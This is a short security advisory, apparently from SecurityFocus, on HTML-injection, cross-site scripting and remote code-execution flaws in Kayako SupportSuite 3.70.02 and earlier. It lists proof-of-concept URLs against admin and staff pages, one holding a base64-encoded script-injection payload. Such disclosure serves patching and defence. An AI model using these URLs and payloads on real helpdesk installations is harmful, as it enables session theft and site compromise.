source: https://www.securityfocus.com/bid/51377/info
Kayako SupportSuite is prone to the following vulnerabilities:
1. Multiple HTML-injection vulnerabilities.
2. A remote code-execution vulnerability.
3. Multiple cross-site scripting vulnerabilities.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.
Kayako SupportSuite 3.70.02-stable and prior versions are vulnerable.
Remote code-execution:
http://www.example.com/support/admin/index.php?_m=core&_a=edittemplate&templateid=11&templateupdate=register
Cross-site scripting:
http://www.example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9
http://www.example.com/support/staff/index.php?_m=news&_a=managenews
http://www.example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories
http://www.example.com/support/staff/index.php?_m=downloads&_a=managefiles
http://www.example.com/support/staff/index.php?_m=teamwork&_a=editcontact&contactid=[added contact ID]
http://www.example.com/support/staff/index.php?_m=livesupport&_a=adtracking
http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedresponses
http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts
http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters